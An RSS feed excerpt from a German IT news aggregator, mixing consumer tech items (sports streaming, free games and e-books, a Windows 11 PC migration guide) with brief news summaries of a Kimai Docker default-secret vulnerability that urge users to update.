<guid isPermaLink="true">https://tsecurity.de/de/3680663/it-nachrichten/motorola-wer-dieses-handy-nutzt-muss-im-juli-aktiv-werden/</guid>
<pubDate>Mon, 20 Jul 2026 11:03:19 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Motorola verteilt für seine Handys im Juli ein wichtiges Sicherheitsupdate. Der Patch steht aktuell schon für dieses Modell zum Download bereit.
																					Dieser Artikel wurde einsortiert unter 
																	<a href="https://www.netzwelt.de/download/index.html">Download</a>,																	<a href="https://www.netzwelt.de/download/8900-android-kostenlos.html">Android</a>,																	<a href="https://www.netzwelt.de/update-fahrplan/lenovo-android-updates-smartphones-tablets-ueberblick.html">Lenovo und Motorola: So lange erhalten die Smartphones und Tablets Android-Updates</a>.]]></content:encoded>
</item>
<item>
<title><![CDATA[Gratis bei Amazon: 15 Kindle-E-Books mit Spannung, Herz und einer besonderen Überraschung]]></title>
<description><![CDATA[Mit Start der neuen Woche nimmt Amazon wieder 15 Kindle-E-Books kostenlos ins Angebot. Neben spannenden Krimis und Liebesromanen gibt es einen echten Klassiker aus Hesses Feder.]]></description>
<link>https://tsecurity.de/de/3680653/it-nachrichten/gratis-bei-amazon-15-kindle-e-books-mit-spannung-herz-und-einer-besonderen-ueberraschung/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3680653/it-nachrichten/gratis-bei-amazon-15-kindle-e-books-mit-spannung-herz-und-einer-besonderen-ueberraschung/</guid>
<pubDate>Mon, 20 Jul 2026 11:03:06 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Mit Start der neuen Woche nimmt Amazon wieder 15 Kindle-E-Books kostenlos ins Angebot. Neben spannenden Krimis und Liebesromanen gibt es einen echten Klassiker aus Hesses Feder.]]></content:encoded>
</item>
<item>
<title><![CDATA[Kimai Docker Vulnerability Exposes Default APP_SECRET, Enabling Account Takeover]]></title>
<description><![CDATA[Kimai users who are running the official Docker image are strongly urged to update their installations after a critical vulnerability, tracked as CVE-2026-52824 and GHSA-jr9p-4h4j-6c58, was discovered. This vulnerability exposes installations to the risk of account takeover due to a publicly know...]]></description>
<link>https://tsecurity.de/de/3680380/it-security-nachrichten/kimai-docker-vulnerability-exposes-default-appsecret-enabling-account-takeover/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3680380/it-security-nachrichten/kimai-docker-vulnerability-exposes-default-appsecret-enabling-account-takeover/</guid>
<pubDate>Mon, 20 Jul 2026 08:23:09 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Kimai users who are running the official Docker image are strongly urged to update their installations after a critical vulnerability, tracked as CVE-2026-52824 and GHSA-jr9p-4h4j-6c58, was discovered. This vulnerability exposes installations to the risk of account takeover due to a publicly known application secret. The flaw affects Kimai versions 2.57.0 and earlier, and it has […]</p>
<p>The post <a href="https://gbhackers.com/kimai-docker-vulnerability-exposes-default-app_secret/">Kimai Docker Vulnerability Exposes Default APP_SECRET, Enabling Account Takeover</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Kimai Docker Vulnerability Exposes Default APP_SECRET, Enabling Account Takeover]]></title>
<description><![CDATA[Kimai users who are running the official Docker image are strongly urged to update their installations after a critical vulnerability, tracked as CVE-2026-52824 and GHSA-jr9p-4h4j-6c58, was discovered. This vulnerability exposes installations to the risk of account takeover due to a…
Read more →
...]]></description>
<link>https://tsecurity.de/de/3680372/it-security-nachrichten/kimai-docker-vulnerability-exposes-default-appsecret-enabling-account-takeover/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3680372/it-security-nachrichten/kimai-docker-vulnerability-exposes-default-appsecret-enabling-account-takeover/</guid>
<pubDate>Mon, 20 Jul 2026 08:22:58 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Kimai users who are running the official Docker image are strongly urged to update their installations after a critical vulnerability, tracked as CVE-2026-52824 and GHSA-jr9p-4h4j-6c58, was discovered. This vulnerability exposes installations to the risk of account takeover due to a…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/kimai-docker-vulnerability-exposes-default-app_secret-enabling-account-takeover/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/kimai-docker-vulnerability-exposes-default-app_secret-enabling-account-takeover/">Kimai Docker Vulnerability Exposes Default APP_SECRET, Enabling Account Takeover</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Critical Kimai Docker Flaw Lets Hackers Forge Cookies and Hijack Admin Accounts]]></title>
<description><![CDATA[A critical vulnerability in the official Kimai Docker image has been disclosed, allowing unauthenticated attackers to forge authentication tokens and take over any user account, including super_admin, on affected deployments. Tracked as CVE-2026-52824, the flaw stems from a hardcoded default secr...]]></description>
<link>https://tsecurity.de/de/3680368/it-security-nachrichten/critical-kimai-docker-flaw-lets-hackers-forge-cookies-and-hijack-admin-accounts/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3680368/it-security-nachrichten/critical-kimai-docker-flaw-lets-hackers-forge-cookies-and-hijack-admin-accounts/</guid>
<pubDate>Mon, 20 Jul 2026 08:22:53 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A critical vulnerability in the official Kimai Docker image has been disclosed, allowing unauthenticated attackers to forge authentication tokens and take over any user account, including super_admin, on affected deployments. Tracked as CVE-2026-52824, the flaw stems from a hardcoded default secret shipped in Kimai’s containerized deployments. The official Kimai Docker image sets APP_SECRET=change_this_to_something_unique as a […]</p>
<p>The post <a href="https://cyberpress.org/critical-kimai-docker-flaw/">Critical Kimai Docker Flaw Lets Hackers Forge Cookies and Hijack Admin Accounts</a> appeared first on <a href="https://cyberpress.org/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Spanien vs. Argentinien: So empfangt ihr die Highlights des WM-Finals 2026 kostenlos]]></title>
<description><![CDATA[Die meisten werden sich das WM-Finale 2026 zwischen Spanien und Argentinien live ansehen - für alle anderen ist die Netzwelt da. So empfangt ihr die Highlights kostenlos, ohne gespoilert zu werden.
																					Dieser Artikel wurde einsortiert unter 
																	ARD,																	...]]></description>
<link>https://tsecurity.de/de/3680243/it-nachrichten/spanien-vs-argentinien-so-empfangt-ihr-die-highlights-des-wm-finals-2026-kostenlos/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3680243/it-nachrichten/spanien-vs-argentinien-so-empfangt-ihr-die-highlights-des-wm-finals-2026-kostenlos/</guid>
<pubDate>Mon, 20 Jul 2026 06:34:59 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Die meisten werden sich das WM-Finale 2026 zwischen Spanien und Argentinien live ansehen - für alle anderen ist die Netzwelt da. So empfangt ihr die Highlights kostenlos, ohne gespoilert zu werden.
																					Dieser Artikel wurde einsortiert unter 
																	<a href="https://www.netzwelt.de/tv-sender/ard.html">ARD</a>,																	<a href="https://www.netzwelt.de/tv-sender/zdf.html">ZDF</a>,																	<a href="https://www.netzwelt.de/fussball-internet/index.html">Bundesliga-Live-Stream: Fußball im Internet schauen</a>,																	<a href="https://www.netzwelt.de/live-tv-anbieter/">Internet-Fernsehen</a>,																	<a href="https://www.netzwelt.de/video/index.html">Entertainment</a>,																	<a href="https://www.netzwelt.de/live-tv-anbieter/magentatv-index.html">MagentaTV</a>.]]></content:encoded>
</item>
<item>
<title><![CDATA[Spanien gegen Argentinien: Auf diesem Sender läuft das Finale der Fußball-WM 2026 kostenlos im TV und Live-Stream]]></title>
<description><![CDATA[Spanien und Argentinien stehen sich am Sonntagabend im Finale der Fußball-Weltmeisterschaft 2026 gegenüber. Hier seht ihr, welcher Sender die Partie gratis im TV und Live-Stream überträgt.
																					Dieser Artikel wurde einsortiert unter 
																	ZDF,																	Bundeslig...]]></description>
<link>https://tsecurity.de/de/3679789/it-nachrichten/spanien-gegen-argentinien-auf-diesem-sender-laeuft-das-finale-der-fussball-wm-2026-kostenlos-im-tv-und-live-stream/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679789/it-nachrichten/spanien-gegen-argentinien-auf-diesem-sender-laeuft-das-finale-der-fussball-wm-2026-kostenlos-im-tv-und-live-stream/</guid>
<pubDate>Sun, 19 Jul 2026 19:37:12 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Spanien und Argentinien stehen sich am Sonntagabend im Finale der Fußball-Weltmeisterschaft 2026 gegenüber. Hier seht ihr, welcher Sender die Partie gratis im TV und Live-Stream überträgt.
																					Dieser Artikel wurde einsortiert unter 
																	<a href="https://www.netzwelt.de/tv-sender/zdf.html">ZDF</a>,																	<a href="https://www.netzwelt.de/fussball-internet/index.html">Bundesliga-Live-Stream: Fußball im Internet schauen</a>,																	<a href="https://www.netzwelt.de/video/index.html">Entertainment</a>,																	<a href="https://www.netzwelt.de/live-tv-anbieter/waipu-index.html">Waipu.tv</a>,																	<a href="https://www.netzwelt.de/live-tv-anbieter/magentatv-index.html">MagentaTV</a>.]]></content:encoded>
</item>
<item>
<title><![CDATA[Kreditkarten-Betrug im Hotel-WLAN: &quot;Warum ich im Urlaub nie wieder ohne VPN einkaufe&quot;]]></title>
<description><![CDATA[Unsere Kollegin hat im Hotelzimmer schnell Torwarthandschuhe für ihren Sohn bestellt - kurze Zeit später meldete die Kreditkartenfirma ungewöhnliche Abbuchungen. Lehren aus der Angst-Erfahrung.
																					Dieser Artikel wurde einsortiert unter 
																	Bitdefender,													...]]></description>
<link>https://tsecurity.de/de/3679787/it-nachrichten/kreditkarten-betrug-im-hotel-wlan-quotwarum-ich-im-urlaub-nie-wieder-ohne-vpn-einkaufequot/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679787/it-nachrichten/kreditkarten-betrug-im-hotel-wlan-quotwarum-ich-im-urlaub-nie-wieder-ohne-vpn-einkaufequot/</guid>
<pubDate>Sun, 19 Jul 2026 19:37:09 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Unsere Kollegin hat im Hotelzimmer schnell Torwarthandschuhe für ihren Sohn bestellt - kurze Zeit später meldete die Kreditkartenfirma ungewöhnliche Abbuchungen. Lehren aus der Angst-Erfahrung.
																					Dieser Artikel wurde einsortiert unter 
																	<a href="https://www.netzwelt.de/download/18696-bitdefender-virus-scanner-kostenlos.html">Bitdefender</a>,																	<a href="https://www.netzwelt.de/betrugswarnungen/index.html">Aktuelle Betrugswarnungen</a>,																	<a href="https://www.netzwelt.de/vpn/cyberghost-testbericht.html">CyberGhost</a>.]]></content:encoded>
</item>
<item>
<title><![CDATA[WM 2026: Spanien gegen Argentinien heute kostenlos live im TV und Stream?]]></title>
<description><![CDATA[WM 2026, das große Finale: Wer wird Weltmeister? Wo gibt es das Endspiel zwischen Spanien und Argentinien heute gratis live im TV und Stream?]]></description>
<link>https://tsecurity.de/de/3679785/it-nachrichten/wm-2026-spanien-gegen-argentinien-heute-kostenlos-live-im-tv-und-stream/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679785/it-nachrichten/wm-2026-spanien-gegen-argentinien-heute-kostenlos-live-im-tv-und-stream/</guid>
<pubDate>Sun, 19 Jul 2026 19:37:04 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[WM 2026, das große Finale: Wer wird Weltmeister? Wo gibt es das Endspiel zwischen Spanien und Argentinien heute gratis live im TV und Stream?]]></content:encoded>
</item>
<item>
<title><![CDATA[Gratis-Spiel bei Steam: „The Life and Suffering of Sir Brante“ kostenlos mitnehmen]]></title>
<description><![CDATA[Aktuell könnt ihr bei Steam das Spiel „The Life and Suffering of Sir Brante“ gratis eurer Sammlung hinzufügen. Die Aktion kommt nicht von ungefähr, denn morgen erscheint mit „The Life and Suffering of Prince Jerian“ die indirekte Fortsetzung, für welche...Zum Beitrag: Gratis-Spiel bei Steam: „The...]]></description>
<link>https://tsecurity.de/de/3679451/it-nachrichten/gratis-spiel-bei-steam-the-life-and-suffering-of-sir-brante-kostenlos-mitnehmen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679451/it-nachrichten/gratis-spiel-bei-steam-the-life-and-suffering-of-sir-brante-kostenlos-mitnehmen/</guid>
<pubDate>Sun, 19 Jul 2026 14:17:30 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Aktuell könnt ihr bei Steam das Spiel „The Life and Suffering of Sir Brante“ gratis eurer Sammlung hinzufügen. Die Aktion kommt nicht von ungefähr, denn morgen erscheint mit „The Life and Suffering of Prince Jerian“ die indirekte Fortsetzung, für welche...<p>Zum Beitrag: <a href="https://stadt-bremerhaven.de/gratis-spiel-bei-steam-the-life-and-suffering-of-sir-brante-kostenlos-mitnehmen/">Gratis-Spiel bei Steam: „The Life and Suffering of Sir Brante“ kostenlos mitnehmen</a>
</p><p>
Wo du uns folgen kannst:
<a href="http://www.facebook.com/CaschysBlog">Facebook</a>, <a href="https://www.reddit.com/r/CaschysBlog/">Reddit</a>, <a href="https://news.google.com/publications/CAAqMQgKIitDQklTR2dnTWFoWUtGSE4wWVdSMExXSnlaVzFsY21oaGRtVnVMbVJsS0FBUAE?ceid=DE:de&amp;oc=3">Google News</a>, <a href="https://x.com/CaschysBlog">X</a>, <a href="https://www.threads.com/@caschysblog">Threads</a>
<br>
</p><div>
    <strong>Auf dem Laufenden bleiben?</strong>
    <br>
    <a href="https://www.google.com/preferences/source?q=stadt-bremerhaven.de">Fügt uns doch bei Google als bevorzugte Quelle hinzu!</a>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Dieses Programm ist mein Schweizer Taschenmesser für Windows 11 – und es ist kostenlos]]></title>
<description><![CDATA[Das praktische Microsoft-Tool fungiert als eine Art Schweizer Taschenmesser für Windows 11.Ein Kommentar von Robert Kohlick.]]></description>
<link>https://tsecurity.de/de/3679354/downloads/dieses-programm-ist-mein-schweizer-taschenmesser-fuer-windows-11-und-es-ist-kostenlos/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679354/downloads/dieses-programm-ist-mein-schweizer-taschenmesser-fuer-windows-11-und-es-ist-kostenlos/</guid>
<pubDate>Sun, 19 Jul 2026 13:02:01 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Das praktische Microsoft-Tool fungiert als eine Art Schweizer Taschenmesser für Windows 11.Ein Kommentar von Robert Kohlick.]]></content:encoded>
</item>
<item>
<title><![CDATA[Formel 1 in Spa: Auf diesem Sender seht ihr den Großen Preis von Belgien kostenlos im TV und Live-Stream]]></title>
<description><![CDATA[Am Sonntagnachmittag steht der Große Preis von Belgien an - der nächste Grand Prix in der Formel 1. Wir zeigen euch, wie ihr das Rennen gratis im TV und Live-Stream empfangen könnt.
																					Dieser Artikel wurde einsortiert unter 
																	RTL,																	WOW,												...]]></description>
<link>https://tsecurity.de/de/3679187/it-nachrichten/formel-1-in-spa-auf-diesem-sender-seht-ihr-den-grossen-preis-von-belgien-kostenlos-im-tv-und-live-stream/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679187/it-nachrichten/formel-1-in-spa-auf-diesem-sender-seht-ihr-den-grossen-preis-von-belgien-kostenlos-im-tv-und-live-stream/</guid>
<pubDate>Sun, 19 Jul 2026 10:47:53 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Am Sonntagnachmittag steht der Große Preis von Belgien an - der nächste Grand Prix in der Formel 1. Wir zeigen euch, wie ihr das Rennen gratis im TV und Live-Stream empfangen könnt.
																					Dieser Artikel wurde einsortiert unter 
																	<a href="https://www.netzwelt.de/tv-sender/rtl.html">RTL</a>,																	<a href="https://www.netzwelt.de/live-tv-anbieter/wow-index.html">WOW</a>,																	<a href="https://www.netzwelt.de/video/index.html">Live-Streams</a>,																	<a href="https://www.netzwelt.de/tv-sender/srf-2.html">SRF 2</a>,																	<a href="https://www.netzwelt.de/live-tv-anbieter/wow-index.html">WOW (Sky Ticket)</a>,																	<a href="https://www.netzwelt.de/live-tv-anbieter/rtl-plus-index.html">RTL+</a>,																	<a href="https://www.netzwelt.de/video/index.html">Entertainment</a>,																	<a href="https://www.netzwelt.de/wow/index.html">Sky</a>,																	<a href="https://www.netzwelt.de/tv-sender/sky-sport-f1.html">Sky Sport F1</a>,																	<a href="https://www.netzwelt.de/live-tv-anbieter/sky-index.html">Sky Q</a>,																	<a href="https://www.netzwelt.de/tv-sender/servus-tv-oesterreich.html">Servus TV Österreich</a>.]]></content:encoded>
</item>
<item>
<title><![CDATA[Neuer PC? So übertragen Sie alles auf Windows 11 ohne Stress]]></title>
<description><![CDATA[Ein neuer PC ist schnell gekauft – der eigentliche Aufwand beginnt danach. Programme, Dateien, Benutzerkonten und Einstellungen sollen möglichst vollständig vom alten Rechner mitkommen. Wer alles von Hand einrichtet, verliert schnell einen ganzen Tag.



Umzugssoftware nimmt Ihnen diese Arbeit ab...]]></description>
<link>https://tsecurity.de/de/3679150/windows-tipps/neuer-pc-so-uebertragen-sie-alles-auf-windows-11-ohne-stress/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679150/windows-tipps/neuer-pc-so-uebertragen-sie-alles-auf-windows-11-ohne-stress/</guid>
<pubDate>Sun, 19 Jul 2026 10:41:36 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Ein neuer PC ist schnell gekauft – der eigentliche Aufwand beginnt danach. Programme, Dateien, Benutzerkonten und Einstellungen sollen möglichst vollständig vom alten Rechner mitkommen. Wer alles von Hand einrichtet, verliert schnell einen ganzen Tag.</p>



<p>Umzugssoftware nimmt Ihnen diese Arbeit ab und überträgt viele Inhalte in einem Durchgang. Das lohnt sich besonders, wenn der alte Windows-10-PC ersetzt wird: Zwar gibt es über erweiterte Sicherheitsupdates noch Aufschub bis 2027, langfristig führt beim Neukauf aber meist Windows 11 den Weg vor. Wir zeigen, welche Wege es für den PC-Umzug gibt und worauf Sie achten sollten.</p>



<h2 class="wp-block-heading">Welche Wege es für den Datenumzug gibt</h2>



<p>Für den Wechsel auf einen neuen PC haben Sie drei Möglichkeiten. Spezialisierte Umzugssoftware überträgt Programme, Benutzerkonten und Dateien in einem Rutsch – der bequemste Weg, wenn installierte Anwendungen mitkommen sollen.</p>



<div class="ppl_wrap"><div class="top_head"><p class="pro_tag">PROMOTION</p><p><strong>Ihr Bildschirm ist zu klein? Dieser 17-Zöller bietet Platz für alles</strong></p></div><div class="ppl_row"><div class="pro_right promotion-item__image-outer-wrapper--small"><img decoding="async" class="promotion-item__image" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/HP-PPL-7.png" loading="lazy"></div><p class="ppl_text">
</p><p>Das HP OmniBook 7 überzeugt mit einem großzügigen 17,3 Zoll FHD-Touchdisplay für Übersicht bei Office-Arbeit, Multimedia und leichtem Gaming. Der Intel® Core™ Ultra 7 Prozessor mit 32 GB RAM meistert anspruchsvolle Aufgaben, die NVIDIA® RTX™ 4050 sorgt für zusätzliche Grafikleistung bei Kreativ-Workflows. Die beleuchtete Tastatur mit Nummernblock erleichtert die Dateneingabe, Fast Charge bringt den Akku schnell wieder auf 50 %.</p>
</div><div class="clear-both"></div><div class="more_btn"><a href="https://www.awin1.com/cread.php?awinaffid=486277&amp;awinmid=11348&amp;clickref=rss&amp;ued=https://www.notebooksbilliger.de/hp+omnibook+7+17+dc0177ng+888580" target="_blank" class="promotion-view-deal-link" rel="noopener">Erfahren Sie mehr über das HP OmniBook 7</a></div></div>



<p>Die Bordmittel von Windows decken primär persönliche Dateien und ausgewählte Einstellungen ab: Über ein Microsoft-Konto und OneDrive landen synchronisierte Ordner, einige Windows-Einstellungen sowie Store-Apps auf dem neuen Gerät. Klassische Desktop-Programme müssen Sie damit jedoch neu installieren.</p>



<p>Bleibt der manuelle Umzug per externer Festplatte oder NAS. Diese Methode ist günstig und transparent, aber zeitraubend. Sie kopieren Dokumente, Bilder, Downloads, Browserprofile und Projektordner selbst und installieren anschließend jede Anwendung neu. Dieser Ratgeber stellt deshalb die komfortablere Variante mit Umzugssoftware in den Mittelpunkt und vergleicht zwei verbreitete Programme.</p>



<h2 class="wp-block-heading">Windows-Umzug mit PCmover Professional</h2>



<p><a href="https://software.pcwelt.de/offer/laplink-pcmover-professional-v11/44211?x-source=rss">PCmover Professional</a> von Laplink zählt zu den bekanntesten Umzugsprogrammen für Windows. Es kopiert Anwendungen, Daten, Benutzerkonten und Einstellungen vom alten Windows-PC auf den neuen Rechner mit Windows 11. Die Software kostet ab 34,95 Euro, eine reine Testversion reicht in der Regel nicht für einen vollständigen Programmumzug.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a5c8db0d5d8b"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2023/06/pcmover-Transferoptionen.png?w=1200" alt="Laplink PCmover Professional v11 Optionen" class="wp-image-1945143" width="1200" height="799" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Christoph Hoffmann</p></div>



<p>Installieren Sie PCmover zunächst auf dem alten PC, also der Quelle. Nach dem Start ist die Übertragung zwischen zwei Rechnern voreingestellt. Unter „Erweiterte Optionen“ stehen zusätzlich der Umzug per Laufwerk und per Imagedatei bereit. Ein Klick auf „Übertragung zwischen PCs“ startet den Vorgang. Vor dem Fortfahren tragen Sie Name, E-Mail-Adresse und die nach dem Kauf erhaltene Seriennummer ein.</p>



<p>Installieren und starten Sie das Programm danach auf dem Ziel-PC mit Windows 11. Beide Rechner müssen sich im selben Netzwerk befinden. Ein spezielles Kabel ist nicht nötig, wenn beide PCs per LAN oder stabilem WLAN verbunden sind. Für große Datenmengen empfiehlt sich Gigabit-LAN, weil der Transfer darüber deutlich zuverlässiger und schneller läuft als über ein schwaches Funknetz.</p>



<p>PCmover sucht den Ziel-PC und stellt die Verbindung her. Anschließend zeigt die Software beide Rechner nebeneinander an. Prüfen Sie an dieser Stelle unbedingt die Übertragungsrichtung: Quelle muss der alte PC sein, Ziel der neue Windows-11-Rechner. Bei Bedarf lässt sich die Richtung umkehren.</p>



<p>Ein Klick auf „PC analysieren“ führt zur Auswahl. Hier stehen mehrere Optionen bereit, von der empfohlenen Standardübertragung bis zur manuellen Auswahl. Mit der Standardoption wird der neue PC weitgehend zum Abbild des alten – etwa mit Windows 11 statt Windows 10. </p>



<p>Über „Weiter“ erhalten Sie eine Zusammenfassung in mehreren Kategorien. Kontrollieren Sie vordergründig den Punkt „Anwendungen“: Standardmäßig sind alle übertragbaren Programme markiert; einzelne können abgewählt werden.</p>



<p>Wie lange der Umzug dauert, hängt von der Datenmenge, dem Netzwerktempo und der Anzahl der Programme ab. Bei einem gut gefüllten PC kommen schnell mehrere Stunden zusammen. Nach Abschluss meldet das Programm den Erfolg. Starten Sie den neuen PC neu, damit alle Änderungen greifen.</p>



<h2 class="wp-block-heading">Die Alternative: EaseUS Todo PCTrans</h2>



<p>Wer nicht zwingend zu PCmover greifen möchte, findet in <a href="https://www.dpbolvw.net/click-1676582-15557692?sid=rss&amp;url=https://www.easeus.de/daten-uebertragen-software/pctrans-free.html">EaseUS Todo PCTrans</a> eine verbreitete Alternative. Das Programm überträgt ebenfalls Programme, Dateien, Benutzerkonten und Einstellungen zwischen zwei Rechnern. Der Umzug von Windows 10 auf Windows 11 zählt zu den typischen Einsatzszenarien.</p>



<p>Der wichtigste Unterschied liegt beim Einstieg. EaseUS Todo PCTrans gibt es als Free-Version, die nur fünf Programme und eine zwei Gigabyte Daten überträgt. Das genügt zum Ausprobieren oder für sehr kleine Umzüge. Wer viele Programme, große Benutzerordner oder mehrere Konten übertragen will, benötigt die kostenpflichtige <a href="https://www.dpbolvw.net/click-1676582-15557692?sid=rss&amp;url=https://www.easeus.de/daten-uebertragen-software/pctrans.html">Pro-Version</a> ab 40 Euro.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a5c8db0d672e"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/06/easeus-todo-pctrans-2-2.jpg?quality=50&amp;strip=all" alt="easeus-todo-pctrans" class="wp-image-3178968" width="997" height="696" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">EaseUS</p></div>



<p>Die Bedienung folgt demselben Grundmuster wie bei PCmover. Sie installieren das Programm auf beiden Rechnern und legen über „PC zu PC“ die Richtung fest: alter PC als Quelle, neuer PC als Ziel. Beide Geräte müssen sich im selben Netzwerk befinden. Danach wählen Sie aus, welche Programme, Dateien und Konten mitkommen, und starten die Übertragung.</p>



<p>Neben dem Netzwerkweg beherrscht EaseUS Todo PCTrans auch den Umzug per Imagedatei auf einem externen Datenträger. Das ist praktisch, wenn beide PCs nicht gleichzeitig verfügbar sind oder der alte Rechner nur noch eingeschränkt läuft. Der Transfer erfolgt lokal, nicht über fremde Cloud-Server.</p>



<h2 class="wp-block-heading">PCmover oder EaseUS – was passt zu wem?</h2>



<p>Beide Programme verfolgen denselben Zweck, unterscheiden sich aber bei Preis, Bedienlogik und Zielgruppe. EaseUS Todo PCTrans ist attraktiv, wenn Sie zunächst kostenlos testen oder nur wenige Programme übertragen möchten. </p>



<p>Für einen kompletten Umzug mit vielen Anwendungen und großen Datenmengen führt dagegen auch hier meist kein Weg an einer kostenpflichtigen Version vorbei.</p>



<p>PCmover Professional richtet sich stärker an Anwender, die einen möglichst vollständigen und kontrollierten Wechsel wünschen. Das Programm ist besonders interessant, wenn der neue Rechner dem alten möglichst stark ähneln soll und viele installierte Anwendungen mitkommen müssen.</p>



<p>Für einfache Fälle reicht oft die Kombination aus OneDrive, externer Festplatte und Neuinstallation der wichtigsten Programme. Für komplexe Systeme mit vielen Anwendungen, mehreren Benutzerkonten und gewachsenen Ordnerstrukturen spart Umzugssoftware dagegen viel Zeit.</p>



<h2 class="wp-block-heading">Tipp: Mailkonten auf den neuen PC umziehen</h2>



<p>Eine Windows-Neuinstallation oder ein neuer PC sind ein guter Anlass, auch das Mailprogramm zu überdenken – etwa eM Client, Thunderbird oder Outlook. Am einfachsten gelingt der Umzug, wenn Ihre Mailkonten bereits per IMAP eingerichtet sind. Bei IMAP bleiben die Nachrichten auf dem Server Ihres Mailproviders gespeichert und werden nur mit dem jeweiligen Gerät synchronisiert.</p>



<p>Der Vorteil: Sie greifen mit PC, Notebook, Smartphone oder Webmailer auf denselben Mailbestand zu. Für den Umzug richten Sie das Konto im Mailprogramm auf dem neuen Windows-PC einfach erneut ein. Dazu starten Sie den Einrichtungsassistenten, geben E-Mail-Adresse und Passwort ein und warten anschließend, bis das Programm alle Nachrichten synchronisiert hat. Je nach Postfachgröße und Internetverbindung kann das einige Zeit dauern.</p>


